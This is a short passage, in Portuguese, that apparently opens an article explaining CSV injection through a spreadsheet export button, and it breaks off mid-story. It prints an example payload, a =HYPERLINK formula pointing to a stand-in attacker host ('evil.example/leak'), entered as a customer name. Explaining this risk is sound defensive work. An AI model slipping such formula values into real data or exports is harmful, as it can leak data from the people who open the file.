Injeção de CSV: O Botão de Exportação que Executa Código

Um cliente insere seu nome. Ele digita =HYPERLINK("http://evil.example/leak", "click"). Seu sistema aceita. Parece um texto simples.

Semanas depois, sua equipe financeira exporta uma lista de clientes para CSV. Eles abrem o arquivo no Excel